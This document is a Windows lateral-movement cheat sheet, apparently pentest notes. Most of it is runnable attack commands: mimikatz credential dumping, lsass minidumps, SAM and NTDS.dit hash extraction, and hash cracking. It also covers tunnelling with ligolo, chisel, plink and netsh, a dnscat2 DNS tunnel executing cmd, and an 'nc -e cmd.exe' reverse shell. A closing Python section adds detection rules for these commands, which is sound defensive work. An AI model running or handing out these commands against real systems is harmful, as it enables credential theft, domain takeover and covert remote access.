
# Windows Lateral Movement

### Mimikatz

Link: <https://github.com/ParrotSec/mimikatz>

```bash
# Dump local user (SAM) hashes
./mimikatz.exe "token::elevate" "lsadump::sam" "exit"
# Dump LSA hashes
./mimikatz.exe "token::elevate" "lsadump::lsa /patch" "exit"
# Cached credentials (LSA secrets)
./mimikatz.exe "token::elevate" "lsadump::secrets" "exit"

# Hashes and Kerberos tickets of currently logged-on users (from LSASS memory)
./mimikatz.exe "token::elevate" "sekurlsa::logonpasswords" "exit"
./mimikatz.exe "token::elevate" "sekurlsa::tickets" "exit"

# Inside the mimikatz console:
privilege::debug # request SeDebugPrivilege (privilege check)
token::elevate   # impersonate the SYSTEM token (privilege elevation)

# Crack the NTLM hashes (hashcat mode 1000)
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
```

### LSADump

`Open Task Manager` > `Select the Processes tab` > `Find & right click the Local Security Authority Process` > `Select Create dump file`

```bash
# Find the lsass process ID
tasklist /svc
Get-Process lsass

# Take a minidump of lsass (replace 672 with the PID found above)
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

# Parse the dump offline on Kali
pypykatz lsa minidump lsass.dmp
```

### Hash Dumping

```bash
# Save the registry hives that hold the local hashes
reg save hklm\system system
reg save hklm\sam sam
reg save hklm\security security

impacket-secretsdump -sam sam -system system local

# Crack the NTLM hashes (-a 0 = wordlist mode; -a 3 is mask/brute-force mode and does not take a wordlist)
john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -a 0 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt

# KeePass database (hashcat mode 13400); the same hash file is used in both steps
keepass2john Database.kdbx > keepass.hash
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
```

### NTDS.Dit Dump (Domain Controller)

```bash
# Create a shadow copy and copy NTDS.dit out of it (the live file is locked);
# the shadow copy number (here 2) comes from vssadmin's output
vssadmin CREATE SHADOW /For=C:
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

# secretsdump also needs the SYSTEM hive (reg save hklm\system system, see Hash Dumping)
impacket-secretsdump -ntds NTDS.dit -system system LOCAL

# Remote: dump directly from the DC with domain admin credentials
impacket-secretsdump administrator:'password123'@192.168.1.1 -just-dc
```

### Ligolo

```bash
# Attacker side (proxy server)
./proxy -selfcert -laddr 0.0.0.0:443
# Target side (agent)
./agent.exe -ignore-cert -connect 192.168.1.2:443

# In the ligolo proxy console
interface_create --name ligolo
route_add --name ligolo --route 240.0.0.1/32 # the agent's localhost (ligolo-ng magic address)
route_add --name ligolo --route 10.0.0.0/24 # internal subnet reachable from the agent (network address, not a host)
tunnel_start # start the tunnel

# Open port 1234 on the target (agent) and forward incoming connections to our 4321
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
```

### Chisel

```bash
./chisel server --port 8081 --reverse # Kali

# Reverse SOCKS proxy: Kali:1080 -> networks reachable from the target
./chisel client 192.168.1.2:8081 R:socks &> /tmp/output # Target
mousepad /etc/proxychains4.conf # add the line below
socks5 127.0.0.1 1080

./chisel client 192.168.1.2:8081 R:3307:127.0.0.1:3306 # Kali:3307 -> Target:3306


# Open a port on the target to receive a shell (server runs on the target)
./chisel server --port 8081 --reverse # Target
./chisel client 192.168.1.3:8081 R:8080:0.0.0.0:80 # Target:8080 -> Kali:80 (the server side listens with R:)
```

### Port Forwarding

```bash
# Local (Kali)
systemctl start ssh
mousepad /etc/proxychains4.conf # add the line below
socks5 127.0.0.1 9999

# SSH tunnelling: reverse dynamic forward from the target, SOCKS listener on Kali:9999
ssh -N -R 9999 root@192.168.1.2
proxychains nmap -v -sT -Pn -n 172.168.1.3

# Plink tunnel (Windows target): expose the target's RDP (3389) on Kali:3390
C:\Windows\Temp\nc.exe -e cmd.exe 192.168.1.2 1234
C:\Windows\Temp\plink.exe -ssh -l root -pw root -R 127.0.0.1:3390:127.0.0.1:3389 192.168.1.3
nmap -sT -p 3390 127.0.0.1


# Netsh tunnel (requires local admin)
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.1.3 connectport=22 connectaddress=10.0.0.4
netsh interface portproxy show all
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.1.3 localport=2222 action=allow
ssh database_admin@192.168.1.3 -p 2222
# Clean up: remove the firewall rule and the proxy entry (same listenaddress as the add command)
netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.1.3

# Meterpreter: local port 1234 -> port 80 on the remote host (-r takes a single host, not a subnet)
portfwd add -l 1234 -p 80 -r 10.0.0.1
```

### DNS Tunneling

```bash
# Kali: dnscat2 server, authoritative for inlanefreight.local
ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

# Target (PowerShell client); the pre-shared secret must match the one printed by the server
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd

# Interact with session 1 on the server
dnscat2> window -i 1
```
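The defender's view of the commands collected on this page, as an added example that is not part of the original notes: a small Python rule set run over constructed process-creation events (a `host user | command line` export format is assumed, for instance built from Sysmon Event ID 1 or Windows 4688), flagging the mimikatz modules, the comsvcs.dll minidump, hive saves, shadow-copy access to NTDS.dit, netsh portproxy, plink and chisel tunnels and the dnscat2 client shown in the sections above. The rule names, log format and sample events are all constructed for the example.

```python
"""Added example: detection rules for the commands in this cheat sheet.
Input is a constructed export of process-creation events, one per line, in
the form "host user | command line". Not part of the original notes.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set, Tuple


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str
    pattern: re.Pattern


@dataclass(frozen=True)
class Hit:
    line_no: int
    host: str
    user: str
    rule: str
    technique: str
    command: str


# One rule per command family documented above; each is matched
# case-insensitively against the full command line.
RULES: Tuple[Rule, ...] = (
    Rule("mimikatz-module", "credential dumping",
         re.compile(r"(sekurlsa|lsadump)::", re.I)),
    Rule("lsass-minidump-comsvcs", "credential dumping",
         re.compile(r"rundll32.*comsvcs\.dll\s*,?\s*minidump", re.I)),
    Rule("hive-save", "credential dumping",
         re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)),
    Rule("vss-shadow-create", "credential dumping",
         re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I)),
    Rule("ntds-copy-from-shadow", "credential dumping",
         re.compile(r"harddiskvolumeshadowcopy\d+.*\\ntds\.dit", re.I)),
    Rule("netsh-portproxy-add", "port forwarding",
         re.compile(r"\bnetsh\s+interface\s+portproxy\s+add\b", re.I)),
    Rule("plink-reverse-tunnel", "port forwarding",
         re.compile(r"\bplink(\.exe)?\b.*\s-R\s", re.I)),
    Rule("chisel-reverse-client", "tunnelling",
         re.compile(r"\bchisel(\.exe)?\s+client\b.*\sR:", re.I)),
    Rule("dnscat2-client", "dns tunnelling",
         re.compile(r"\bStart-Dnscat2\b", re.I)),
)

# Constructed sample events: three benign lines mixed with the tradecraft above.
SAMPLE_EVENTS: List[str] = [
    r"WS01 corp\jdoe | reg query hkcu\software\microsoft\windows\currentversion\run",
    r'WS01 corp\jdoe | mimikatz.exe "token::elevate" "sekurlsa::logonpasswords" "exit"',
    r"WS01 corp\jdoe | rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full",
    r"WS01 corp\jdoe | reg save hklm\sam sam",
    r"WS01 corp\jdoe | reg save hklm\system system",
    r"DC01 corp\svc_backup | vssadmin CREATE SHADOW /For=C:",
    r"DC01 corp\svc_backup | cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit",
    r"SRV02 corp\jdoe | netsh interface portproxy show all",
    r"SRV02 corp\jdoe | netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.1.3 connectport=22 connectaddress=10.0.0.4",
    r"SRV02 corp\jdoe | C:\Windows\Temp\plink.exe -ssh -l root -pw root -R 127.0.0.1:3390:127.0.0.1:3389 192.168.1.3",
    r"SRV02 corp\jdoe | chisel.exe client 192.168.1.2:8081 R:socks",
    r"WS01 corp\jdoe | powershell -c Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -Exec cmd",
    r"WS01 corp\jdoe | rundll32 shell32.dll,Control_RunDLL",
]


def parse_event(line: str) -> Optional[Tuple[str, str, str]]:
    """Split 'host user | command line'; return None for malformed lines."""
    head, sep, command = line.partition(" | ")
    parts = head.split()
    if not sep or len(parts) != 2:
        return None
    return parts[0], parts[1], command.strip()


def scan(lines: Iterable[str]) -> List[Hit]:
    """Run every rule over every event; one Hit per (event, rule) match."""
    hits: List[Hit] = []
    for line_no, line in enumerate(lines, 1):
        parsed = parse_event(line)
        if parsed is None:
            continue
        host, user, command = parsed
        for rule in RULES:
            if rule.pattern.search(command):
                hits.append(Hit(line_no, host, user, rule.name, rule.technique, command))
    return hits


def hosts_by_technique(hits: Iterable[Hit]) -> Dict[str, Set[str]]:
    """Scope the incident: which hosts show which technique."""
    scoped: Dict[str, Set[str]] = {}
    for hit in hits:
        scoped.setdefault(hit.technique, set()).add(hit.host)
    return scoped


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"line {hit.line_no:2d} {hit.host:<5} {hit.rule:<24} {hit.command[:60]}")
    print(hosts_by_technique(scan(SAMPLE_EVENTS)))
```

The rules key on command-line tokens only, so a Task Manager dump of lsass (no command line) is not covered here; that variant shows up as a file-creation event for `lsass.DMP` by `taskmgr.exe` rather than as a process-creation event, and the `netsh portproxy` entry additionally persists under the PortProxy key of the SYSTEM hive, which is worth checking when scoping a host flagged by the `netsh-portproxy-add` rule.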
